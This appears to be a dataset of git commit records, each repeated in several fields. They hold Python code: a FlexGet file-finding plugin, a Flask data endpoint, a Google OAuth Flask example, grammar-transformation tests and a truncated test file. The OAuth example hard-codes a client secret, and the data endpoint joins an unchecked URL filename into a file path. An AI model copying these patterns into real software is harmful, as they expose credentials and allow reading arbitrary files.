register_plugin(InputFind, 'find')
|
<commit_before><commit_msg>Add the find input plugin, which will produce entries from a local directory that match a mask.
git-svn-id: ad91b9aa7ba7638d69f912c9f5d012e3326e9f74@1616 3942dd89-8c5d-46d7-aeed-044bccf3e60c<commit_after>
|
import logging
from flexget.plugin import register_plugin
log = logging.getLogger('find')
class InputFind:
"""
Uses local path content as an input, recurses through directories and creates entries for files that match mask.
You can specify either the mask key, in shell file matching format, (see python fnmatch module,) or regexp key.
Example:
find:
path: /storage/movies/
mask: *.avi
find:
path:
- /storage/movies/
- /storage/tv/
regexp: .*\.(avi|mkv)$
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('path', key='path', required=True)
root.accept('list', key='path').accept('path')
root.accept('text', key='mask')
root.accept('regexp', key='regexp')
root.accept('boolean', key='recursive')
return root
def get_config(self, feed):
from fnmatch import translate
config = feed.config.get('find', None)
# If only a single path is passed turn it into a 1 element list
if isinstance(config['path'], basestring):
config['path'] = [config['path']]
config.setdefault('recursive', False)
# If mask was specified, turn it in to a regexp
if config.get('mask'):
config['regexp'] = translate(config['mask'])
# If no mask or regexp specified, accept all files
if not config.get('regexp'):
config['regexp'] = '.'
return config
def on_feed_input(self, feed):
from flexget.feed import Entry
import os
import re
config = self.get_config(feed)
match = re.compile(config['regexp'], re.IGNORECASE).match
for path in config['path']:
for item in os.walk(unicode(path)):
for name in item[2]:
#If mask fails continue
if match(name) is None:
continue
e = Entry()
e['title'] = name
filepath = os.path.join(item[0], name)
e['location'] = filepath
# Windows paths need an extra / prepended to them for url
if not filepath.startswith('/'):
filepath = '/' + filepath
e['url'] = 'file://%s' % (filepath)
feed.entries.append(e)
# If we are not searching recursively, break after first (base) directory
if not config['recursive']:
break
register_plugin(InputFind, 'find')
|
Add the find input plugin, which will produce entries from a local directory that match a mask.
git-svn-id: ad91b9aa7ba7638d69f912c9f5d012e3326e9f74@1616 3942dd89-8c5d-46d7-aeed-044bccf3e60cimport logging
from flexget.plugin import register_plugin
log = logging.getLogger('find')
class InputFind:
"""
Uses local path content as an input, recurses through directories and creates entries for files that match mask.
You can specify either the mask key, in shell file matching format, (see python fnmatch module,) or regexp key.
Example:
find:
path: /storage/movies/
mask: *.avi
find:
path:
- /storage/movies/
- /storage/tv/
regexp: .*\.(avi|mkv)$
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('path', key='path', required=True)
root.accept('list', key='path').accept('path')
root.accept('text', key='mask')
root.accept('regexp', key='regexp')
root.accept('boolean', key='recursive')
return root
def get_config(self, feed):
from fnmatch import translate
config = feed.config.get('find', None)
# If only a single path is passed turn it into a 1 element list
if isinstance(config['path'], basestring):
config['path'] = [config['path']]
config.setdefault('recursive', False)
# If mask was specified, turn it in to a regexp
if config.get('mask'):
config['regexp'] = translate(config['mask'])
# If no mask or regexp specified, accept all files
if not config.get('regexp'):
config['regexp'] = '.'
return config
def on_feed_input(self, feed):
from flexget.feed import Entry
import os
import re
config = self.get_config(feed)
match = re.compile(config['regexp'], re.IGNORECASE).match
for path in config['path']:
for item in os.walk(unicode(path)):
for name in item[2]:
#If mask fails continue
if match(name) is None:
continue
e = Entry()
e['title'] = name
filepath = os.path.join(item[0], name)
e['location'] = filepath
# Windows paths need an extra / prepended to them for url
if not filepath.startswith('/'):
filepath = '/' + filepath
e['url'] = 'file://%s' % (filepath)
feed.entries.append(e)
# If we are not searching recursively, break after first (base) directory
if not config['recursive']:
break
register_plugin(InputFind, 'find')
|
<commit_before><commit_msg>Add the find input plugin, which will produce entries from a local directory that match a mask.
git-svn-id: ad91b9aa7ba7638d69f912c9f5d012e3326e9f74@1616 3942dd89-8c5d-46d7-aeed-044bccf3e60c<commit_after>import logging
from flexget.plugin import register_plugin
log = logging.getLogger('find')
class InputFind:
"""
Uses local path content as an input, recurses through directories and creates entries for files that match mask.
You can specify either the mask key, in shell file matching format, (see python fnmatch module,) or regexp key.
Example:
find:
path: /storage/movies/
mask: *.avi
find:
path:
- /storage/movies/
- /storage/tv/
regexp: .*\.(avi|mkv)$
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('path', key='path', required=True)
root.accept('list', key='path').accept('path')
root.accept('text', key='mask')
root.accept('regexp', key='regexp')
root.accept('boolean', key='recursive')
return root
def get_config(self, feed):
from fnmatch import translate
config = feed.config.get('find', None)
# If only a single path is passed turn it into a 1 element list
if isinstance(config['path'], basestring):
config['path'] = [config['path']]
config.setdefault('recursive', False)
# If mask was specified, turn it in to a regexp
if config.get('mask'):
config['regexp'] = translate(config['mask'])
# If no mask or regexp specified, accept all files
if not config.get('regexp'):
config['regexp'] = '.'
return config
def on_feed_input(self, feed):
from flexget.feed import Entry
import os
import re
config = self.get_config(feed)
match = re.compile(config['regexp'], re.IGNORECASE).match
for path in config['path']:
for item in os.walk(unicode(path)):
for name in item[2]:
#If mask fails continue
if match(name) is None:
continue
e = Entry()
e['title'] = name
filepath = os.path.join(item[0], name)
e['location'] = filepath
# Windows paths need an extra / prepended to them for url
if not filepath.startswith('/'):
filepath = '/' + filepath
e['url'] = 'file://%s' % (filepath)
feed.entries.append(e)
# If we are not searching recursively, break after first (base) directory
if not config['recursive']:
break
register_plugin(InputFind, 'find')
|
|
769228b6ecf29112c1880802404152822687bb8e
|
backend/data_controller.py
|
backend/data_controller.py
|
from google.protobuf.json_format import MessageToDict
from grpc.messages import data_pb2
import config
from flask_restful import Resource
from flask import request, Flask
import csv
from google.protobuf.timestamp_pb2 import Timestamp
from datetime import datetime
saved_data = {}
app = Flask(__name__)
class Data(Resource):
def get(self, filename):
page = int(request.args.get('page')) if request.args.get('page') else 0
per_page = int(request.args.get('per_page')) if request.args.get('per_page') else config.per_page
if filename in saved_data:
data = saved_data[filename]
else:
data = get_data(config.UPLOAD_FOLDER + '/' + filename)
saved_data[filename] = data
response = data_pb2.SegmentedTimelineDataResponse()
response.data.extend(data.values()[(page * per_page):(page * per_page + per_page)])
return MessageToDict(response)
def add_data(segment, date, inventory):
timestamp = Timestamp()
timestamp.FromDatetime(datetime.strptime(date, '%Y-%m-%d'))
segment.dates.append(timestamp)
segment.inventory_volumes.append(int(inventory))
def get_data(filename):
segments_to_data = {}
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
cursor = iter(csv_reader)
# in order to skip the first line
next(cursor)
for row in cursor:
if (row[1], row[2]) not in segments_to_data:
segments_to_data[(row[1], row[2])] = data_pb2.SegmentData(country=row[1], device=row[2])
add_data(segments_to_data[(row[1], row[2])], row[0], row[3])
return segments_to_data
|
Create Data resource for sending data from the server
|
Create Data resource for sending data from the server
|
Python
|
apache-2.0
|
googleinterns/inventory-visualizer,googleinterns/inventory-visualizer,googleinterns/inventory-visualizer,googleinterns/inventory-visualizer,googleinterns/inventory-visualizer
|
Create Data resource for sending data from the server
|
from google.protobuf.json_format import MessageToDict
from grpc.messages import data_pb2
import config
from flask_restful import Resource
from flask import request, Flask
import csv
from google.protobuf.timestamp_pb2 import Timestamp
from datetime import datetime
saved_data = {}
app = Flask(__name__)
class Data(Resource):
def get(self, filename):
page = int(request.args.get('page')) if request.args.get('page') else 0
per_page = int(request.args.get('per_page')) if request.args.get('per_page') else config.per_page
if filename in saved_data:
data = saved_data[filename]
else:
data = get_data(config.UPLOAD_FOLDER + '/' + filename)
saved_data[filename] = data
response = data_pb2.SegmentedTimelineDataResponse()
response.data.extend(data.values()[(page * per_page):(page * per_page + per_page)])
return MessageToDict(response)
def add_data(segment, date, inventory):
timestamp = Timestamp()
timestamp.FromDatetime(datetime.strptime(date, '%Y-%m-%d'))
segment.dates.append(timestamp)
segment.inventory_volumes.append(int(inventory))
def get_data(filename):
segments_to_data = {}
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
cursor = iter(csv_reader)
# in order to skip the first line
next(cursor)
for row in cursor:
if (row[1], row[2]) not in segments_to_data:
segments_to_data[(row[1], row[2])] = data_pb2.SegmentData(country=row[1], device=row[2])
add_data(segments_to_data[(row[1], row[2])], row[0], row[3])
return segments_to_data
|
<commit_before><commit_msg>Create Data resource for sending data from the server<commit_after>
|
from google.protobuf.json_format import MessageToDict
from grpc.messages import data_pb2
import config
from flask_restful import Resource
from flask import request, Flask
import csv
from google.protobuf.timestamp_pb2 import Timestamp
from datetime import datetime
saved_data = {}
app = Flask(__name__)
class Data(Resource):
def get(self, filename):
page = int(request.args.get('page')) if request.args.get('page') else 0
per_page = int(request.args.get('per_page')) if request.args.get('per_page') else config.per_page
if filename in saved_data:
data = saved_data[filename]
else:
data = get_data(config.UPLOAD_FOLDER + '/' + filename)
saved_data[filename] = data
response = data_pb2.SegmentedTimelineDataResponse()
response.data.extend(data.values()[(page * per_page):(page * per_page + per_page)])
return MessageToDict(response)
def add_data(segment, date, inventory):
timestamp = Timestamp()
timestamp.FromDatetime(datetime.strptime(date, '%Y-%m-%d'))
segment.dates.append(timestamp)
segment.inventory_volumes.append(int(inventory))
def get_data(filename):
segments_to_data = {}
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
cursor = iter(csv_reader)
# in order to skip the first line
next(cursor)
for row in cursor:
if (row[1], row[2]) not in segments_to_data:
segments_to_data[(row[1], row[2])] = data_pb2.SegmentData(country=row[1], device=row[2])
add_data(segments_to_data[(row[1], row[2])], row[0], row[3])
return segments_to_data
|
Create Data resource for sending data from the serverfrom google.protobuf.json_format import MessageToDict
from grpc.messages import data_pb2
import config
from flask_restful import Resource
from flask import request, Flask
import csv
from google.protobuf.timestamp_pb2 import Timestamp
from datetime import datetime
saved_data = {}
app = Flask(__name__)
class Data(Resource):
def get(self, filename):
page = int(request.args.get('page')) if request.args.get('page') else 0
per_page = int(request.args.get('per_page')) if request.args.get('per_page') else config.per_page
if filename in saved_data:
data = saved_data[filename]
else:
data = get_data(config.UPLOAD_FOLDER + '/' + filename)
saved_data[filename] = data
response = data_pb2.SegmentedTimelineDataResponse()
response.data.extend(data.values()[(page * per_page):(page * per_page + per_page)])
return MessageToDict(response)
def add_data(segment, date, inventory):
timestamp = Timestamp()
timestamp.FromDatetime(datetime.strptime(date, '%Y-%m-%d'))
segment.dates.append(timestamp)
segment.inventory_volumes.append(int(inventory))
def get_data(filename):
segments_to_data = {}
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
cursor = iter(csv_reader)
# in order to skip the first line
next(cursor)
for row in cursor:
if (row[1], row[2]) not in segments_to_data:
segments_to_data[(row[1], row[2])] = data_pb2.SegmentData(country=row[1], device=row[2])
add_data(segments_to_data[(row[1], row[2])], row[0], row[3])
return segments_to_data
|
<commit_before><commit_msg>Create Data resource for sending data from the server<commit_after>from google.protobuf.json_format import MessageToDict
from grpc.messages import data_pb2
import config
from flask_restful import Resource
from flask import request, Flask
import csv
from google.protobuf.timestamp_pb2 import Timestamp
from datetime import datetime
saved_data = {}
app = Flask(__name__)
class Data(Resource):
def get(self, filename):
page = int(request.args.get('page')) if request.args.get('page') else 0
per_page = int(request.args.get('per_page')) if request.args.get('per_page') else config.per_page
if filename in saved_data:
data = saved_data[filename]
else:
data = get_data(config.UPLOAD_FOLDER + '/' + filename)
saved_data[filename] = data
response = data_pb2.SegmentedTimelineDataResponse()
response.data.extend(data.values()[(page * per_page):(page * per_page + per_page)])
return MessageToDict(response)
def add_data(segment, date, inventory):
timestamp = Timestamp()
timestamp.FromDatetime(datetime.strptime(date, '%Y-%m-%d'))
segment.dates.append(timestamp)
segment.inventory_volumes.append(int(inventory))
def get_data(filename):
segments_to_data = {}
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
cursor = iter(csv_reader)
# in order to skip the first line
next(cursor)
for row in cursor:
if (row[1], row[2]) not in segments_to_data:
segments_to_data[(row[1], row[2])] = data_pb2.SegmentData(country=row[1], device=row[2])
add_data(segments_to_data[(row[1], row[2])], row[0], row[3])
return segments_to_data
|
|
21820105c0986cf24b294ef26e70feac81caba5b
|
examples/web_flask.py
|
examples/web_flask.py
|
#!/usr/bin/env python3
# Install dependencies with:
# pip install flask requests requests_oauth2
import os
import logging
import requests
from requests_oauth2.services import GoogleClient
from requests_oauth2 import OAuth2BearerToken
from flask import Flask, request, redirect, session
app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY") or os.urandom(20)
google_auth = GoogleClient(
client_id=("554229061086-np1qvffgq6gi1f6njg99qkeqt4h2gaut"
".apps.googleusercontent.com"),
client_secret="XqTsoS6DXq-W0KgTqvQISBOM",
redirect_uri="http://localhost:5000/google/oauth2callback",
)
@app.route("/")
def index():
return redirect("/google/")
@app.route("/google/")
def google_index():
if not session.get("access_token"):
return redirect("/google/oauth2callback")
with requests.Session() as s:
s.auth = OAuth2BearerToken(session["access_token"])
r = s.get("https://www.googleapis.com/plus/v1/people/me")
r.raise_for_status()
data = r.json()
return "Hello, {}!".format(data["displayName"])
@app.route("/google/oauth2callback")
def google_oauth2callback():
code = request.args.get("code")
error = request.args.get("error")
if error:
return "error :( {!r}".format(error)
if not code:
return redirect(google_auth.authorize_url(
scope=["profile", "email"],
response_type="code",
))
data = google_auth.get_token(
code=code,
grant_type="authorization_code",
)
session["access_token"] = data.get("access_token")
return redirect("/")
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
app.run(debug=True)
|
Add an example Flask app
|
Add an example Flask app
|
Python
|
bsd-3-clause
|
maraujop/requests-oauth2
|
Add an example Flask app
|
#!/usr/bin/env python3
# Install dependencies with:
# pip install flask requests requests_oauth2
import os
import logging
import requests
from requests_oauth2.services import GoogleClient
from requests_oauth2 import OAuth2BearerToken
from flask import Flask, request, redirect, session
app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY") or os.urandom(20)
google_auth = GoogleClient(
client_id=("554229061086-np1qvffgq6gi1f6njg99qkeqt4h2gaut"
".apps.googleusercontent.com"),
client_secret="XqTsoS6DXq-W0KgTqvQISBOM",
redirect_uri="http://localhost:5000/google/oauth2callback",
)
@app.route("/")
def index():
return redirect("/google/")
@app.route("/google/")
def google_index():
if not session.get("access_token"):
return redirect("/google/oauth2callback")
with requests.Session() as s:
s.auth = OAuth2BearerToken(session["access_token"])
r = s.get("https://www.googleapis.com/plus/v1/people/me")
r.raise_for_status()
data = r.json()
return "Hello, {}!".format(data["displayName"])
@app.route("/google/oauth2callback")
def google_oauth2callback():
code = request.args.get("code")
error = request.args.get("error")
if error:
return "error :( {!r}".format(error)
if not code:
return redirect(google_auth.authorize_url(
scope=["profile", "email"],
response_type="code",
))
data = google_auth.get_token(
code=code,
grant_type="authorization_code",
)
session["access_token"] = data.get("access_token")
return redirect("/")
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
app.run(debug=True)
|
<commit_before><commit_msg>Add an example Flask app<commit_after>
|
#!/usr/bin/env python3
# Install dependencies with:
# pip install flask requests requests_oauth2
import os
import logging
import requests
from requests_oauth2.services import GoogleClient
from requests_oauth2 import OAuth2BearerToken
from flask import Flask, request, redirect, session
app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY") or os.urandom(20)
google_auth = GoogleClient(
client_id=("554229061086-np1qvffgq6gi1f6njg99qkeqt4h2gaut"
".apps.googleusercontent.com"),
client_secret="XqTsoS6DXq-W0KgTqvQISBOM",
redirect_uri="http://localhost:5000/google/oauth2callback",
)
@app.route("/")
def index():
return redirect("/google/")
@app.route("/google/")
def google_index():
if not session.get("access_token"):
return redirect("/google/oauth2callback")
with requests.Session() as s:
s.auth = OAuth2BearerToken(session["access_token"])
r = s.get("https://www.googleapis.com/plus/v1/people/me")
r.raise_for_status()
data = r.json()
return "Hello, {}!".format(data["displayName"])
@app.route("/google/oauth2callback")
def google_oauth2callback():
code = request.args.get("code")
error = request.args.get("error")
if error:
return "error :( {!r}".format(error)
if not code:
return redirect(google_auth.authorize_url(
scope=["profile", "email"],
response_type="code",
))
data = google_auth.get_token(
code=code,
grant_type="authorization_code",
)
session["access_token"] = data.get("access_token")
return redirect("/")
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
app.run(debug=True)
|
Add an example Flask app#!/usr/bin/env python3
# Install dependencies with:
# pip install flask requests requests_oauth2
import os
import logging
import requests
from requests_oauth2.services import GoogleClient
from requests_oauth2 import OAuth2BearerToken
from flask import Flask, request, redirect, session
app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY") or os.urandom(20)
google_auth = GoogleClient(
client_id=("554229061086-np1qvffgq6gi1f6njg99qkeqt4h2gaut"
".apps.googleusercontent.com"),
client_secret="XqTsoS6DXq-W0KgTqvQISBOM",
redirect_uri="http://localhost:5000/google/oauth2callback",
)
@app.route("/")
def index():
return redirect("/google/")
@app.route("/google/")
def google_index():
if not session.get("access_token"):
return redirect("/google/oauth2callback")
with requests.Session() as s:
s.auth = OAuth2BearerToken(session["access_token"])
r = s.get("https://www.googleapis.com/plus/v1/people/me")
r.raise_for_status()
data = r.json()
return "Hello, {}!".format(data["displayName"])
@app.route("/google/oauth2callback")
def google_oauth2callback():
code = request.args.get("code")
error = request.args.get("error")
if error:
return "error :( {!r}".format(error)
if not code:
return redirect(google_auth.authorize_url(
scope=["profile", "email"],
response_type="code",
))
data = google_auth.get_token(
code=code,
grant_type="authorization_code",
)
session["access_token"] = data.get("access_token")
return redirect("/")
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
app.run(debug=True)
|
<commit_before><commit_msg>Add an example Flask app<commit_after>#!/usr/bin/env python3
# Install dependencies with:
# pip install flask requests requests_oauth2
import os
import logging
import requests
from requests_oauth2.services import GoogleClient
from requests_oauth2 import OAuth2BearerToken
from flask import Flask, request, redirect, session
app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY") or os.urandom(20)
google_auth = GoogleClient(
client_id=("554229061086-np1qvffgq6gi1f6njg99qkeqt4h2gaut"
".apps.googleusercontent.com"),
client_secret="XqTsoS6DXq-W0KgTqvQISBOM",
redirect_uri="http://localhost:5000/google/oauth2callback",
)
@app.route("/")
def index():
return redirect("/google/")
@app.route("/google/")
def google_index():
if not session.get("access_token"):
return redirect("/google/oauth2callback")
with requests.Session() as s:
s.auth = OAuth2BearerToken(session["access_token"])
r = s.get("https://www.googleapis.com/plus/v1/people/me")
r.raise_for_status()
data = r.json()
return "Hello, {}!".format(data["displayName"])
@app.route("/google/oauth2callback")
def google_oauth2callback():
code = request.args.get("code")
error = request.args.get("error")
if error:
return "error :( {!r}".format(error)
if not code:
return redirect(google_auth.authorize_url(
scope=["profile", "email"],
response_type="code",
))
data = google_auth.get_token(
code=code,
grant_type="authorization_code",
)
session["access_token"] = data.get("access_token")
return redirect("/")
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
app.run(debug=True)
|
|
33ddbe6adc266bfaaf1b89c5780a94a325d51277
|
tests/UselessSymbolsRemove/EpsilonTest.py
|
tests/UselessSymbolsRemove/EpsilonTest.py
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 19.08.2017 16:34
:Licence GNUv3
Part of grammpy-transforms
"""
from unittest import TestCase, main
from grammpy import *
from grammpy_transforms import *
class S(Nonterminal): pass
class A(Nonterminal): pass
class B(Nonterminal): pass
class C(Nonterminal): pass
class D(Nonterminal): pass
class Rules(Rule):
rules = [
([S], [0, S]),
([S], [1, D]),
([S], [EPS]),
([A], [0, C, B]),
([A], [0, A, D]),
([B], [1, B]),
([B], [1, 1, 0]),
([C], [1, C, C]),
([C], [0, A, 1, B]),
([D], [1, 1, A]),
([D], [0, D, 0, 0]),
([D], [1, S]),
([D], [EPS])]
class SimpleTest(TestCase):
def test_epsilonTest(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
com = ContextFree.remove_useless_symbols(g)
self.assertTrue(com.have_term([0, 1]))
self.assertTrue(com.have_nonterm([S, B, D]))
self.assertFalse(com.have_nonterm(A))
self.assertFalse(com.have_nonterm(C))
self.assertEqual(com.rules_count(), 8)
def test_epsilonTestShouldNotChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, A, B, C, D]))
self.assertEqual(g.rules_count(), 13)
def test_epsilonTestShouldChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g, transform_grammar=True)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, B, D]))
self.assertFalse(g.have_nonterm(A))
self.assertFalse(g.have_nonterm(C))
self.assertEqual(g.rules_count(), 8)
if __name__ == '__main__':
main()
|
Add test with epsilon rules
|
Add test with epsilon rules
|
Python
|
mit
|
PatrikValkovic/grammpy
|
Add test with epsilon rules
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 19.08.2017 16:34
:Licence GNUv3
Part of grammpy-transforms
"""
from unittest import TestCase, main
from grammpy import *
from grammpy_transforms import *
class S(Nonterminal): pass
class A(Nonterminal): pass
class B(Nonterminal): pass
class C(Nonterminal): pass
class D(Nonterminal): pass
class Rules(Rule):
rules = [
([S], [0, S]),
([S], [1, D]),
([S], [EPS]),
([A], [0, C, B]),
([A], [0, A, D]),
([B], [1, B]),
([B], [1, 1, 0]),
([C], [1, C, C]),
([C], [0, A, 1, B]),
([D], [1, 1, A]),
([D], [0, D, 0, 0]),
([D], [1, S]),
([D], [EPS])]
class SimpleTest(TestCase):
def test_epsilonTest(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
com = ContextFree.remove_useless_symbols(g)
self.assertTrue(com.have_term([0, 1]))
self.assertTrue(com.have_nonterm([S, B, D]))
self.assertFalse(com.have_nonterm(A))
self.assertFalse(com.have_nonterm(C))
self.assertEqual(com.rules_count(), 8)
def test_epsilonTestShouldNotChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, A, B, C, D]))
self.assertEqual(g.rules_count(), 13)
def test_epsilonTestShouldChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g, transform_grammar=True)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, B, D]))
self.assertFalse(g.have_nonterm(A))
self.assertFalse(g.have_nonterm(C))
self.assertEqual(g.rules_count(), 8)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add test with epsilon rules<commit_after>
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 19.08.2017 16:34
:Licence GNUv3
Part of grammpy-transforms
"""
from unittest import TestCase, main
from grammpy import *
from grammpy_transforms import *
class S(Nonterminal): pass
class A(Nonterminal): pass
class B(Nonterminal): pass
class C(Nonterminal): pass
class D(Nonterminal): pass
class Rules(Rule):
rules = [
([S], [0, S]),
([S], [1, D]),
([S], [EPS]),
([A], [0, C, B]),
([A], [0, A, D]),
([B], [1, B]),
([B], [1, 1, 0]),
([C], [1, C, C]),
([C], [0, A, 1, B]),
([D], [1, 1, A]),
([D], [0, D, 0, 0]),
([D], [1, S]),
([D], [EPS])]
class SimpleTest(TestCase):
def test_epsilonTest(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
com = ContextFree.remove_useless_symbols(g)
self.assertTrue(com.have_term([0, 1]))
self.assertTrue(com.have_nonterm([S, B, D]))
self.assertFalse(com.have_nonterm(A))
self.assertFalse(com.have_nonterm(C))
self.assertEqual(com.rules_count(), 8)
def test_epsilonTestShouldNotChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, A, B, C, D]))
self.assertEqual(g.rules_count(), 13)
def test_epsilonTestShouldChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g, transform_grammar=True)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, B, D]))
self.assertFalse(g.have_nonterm(A))
self.assertFalse(g.have_nonterm(C))
self.assertEqual(g.rules_count(), 8)
if __name__ == '__main__':
main()
|
Add test with epsilon rules#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 19.08.2017 16:34
:Licence GNUv3
Part of grammpy-transforms
"""
from unittest import TestCase, main
from grammpy import *
from grammpy_transforms import *
class S(Nonterminal): pass
class A(Nonterminal): pass
class B(Nonterminal): pass
class C(Nonterminal): pass
class D(Nonterminal): pass
class Rules(Rule):
rules = [
([S], [0, S]),
([S], [1, D]),
([S], [EPS]),
([A], [0, C, B]),
([A], [0, A, D]),
([B], [1, B]),
([B], [1, 1, 0]),
([C], [1, C, C]),
([C], [0, A, 1, B]),
([D], [1, 1, A]),
([D], [0, D, 0, 0]),
([D], [1, S]),
([D], [EPS])]
class SimpleTest(TestCase):
def test_epsilonTest(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
com = ContextFree.remove_useless_symbols(g)
self.assertTrue(com.have_term([0, 1]))
self.assertTrue(com.have_nonterm([S, B, D]))
self.assertFalse(com.have_nonterm(A))
self.assertFalse(com.have_nonterm(C))
self.assertEqual(com.rules_count(), 8)
def test_epsilonTestShouldNotChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, A, B, C, D]))
self.assertEqual(g.rules_count(), 13)
def test_epsilonTestShouldChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g, transform_grammar=True)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, B, D]))
self.assertFalse(g.have_nonterm(A))
self.assertFalse(g.have_nonterm(C))
self.assertEqual(g.rules_count(), 8)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add test with epsilon rules<commit_after>#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 19.08.2017 16:34
:Licence GNUv3
Part of grammpy-transforms
"""
from unittest import TestCase, main
from grammpy import *
from grammpy_transforms import *
class S(Nonterminal): pass
class A(Nonterminal): pass
class B(Nonterminal): pass
class C(Nonterminal): pass
class D(Nonterminal): pass
class Rules(Rule):
rules = [
([S], [0, S]),
([S], [1, D]),
([S], [EPS]),
([A], [0, C, B]),
([A], [0, A, D]),
([B], [1, B]),
([B], [1, 1, 0]),
([C], [1, C, C]),
([C], [0, A, 1, B]),
([D], [1, 1, A]),
([D], [0, D, 0, 0]),
([D], [1, S]),
([D], [EPS])]
class SimpleTest(TestCase):
def test_epsilonTest(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
com = ContextFree.remove_useless_symbols(g)
self.assertTrue(com.have_term([0, 1]))
self.assertTrue(com.have_nonterm([S, B, D]))
self.assertFalse(com.have_nonterm(A))
self.assertFalse(com.have_nonterm(C))
self.assertEqual(com.rules_count(), 8)
def test_epsilonTestShouldNotChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, A, B, C, D]))
self.assertEqual(g.rules_count(), 13)
def test_epsilonTestShouldChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g, transform_grammar=True)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, B, D]))
self.assertFalse(g.have_nonterm(A))
self.assertFalse(g.have_nonterm(C))
self.assertEqual(g.rules_count(), 8)
if __name__ == '__main__':
main()
|
|
a2ebaa051573e72470da241b341d82a89316a796
|
tests/test_utils.py
|
tests/test_utils.py
|
# -*- coding: utf-8 -*-
import unittest
from quantized_mesh_tile.utils import octDecode, octEncode
class TestUtils(unittest.TestCase):
def testOctDecode(self):
vec3 = octDecode(0, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(0, 255)
self.assertEqual(vec3[0], 0.0)
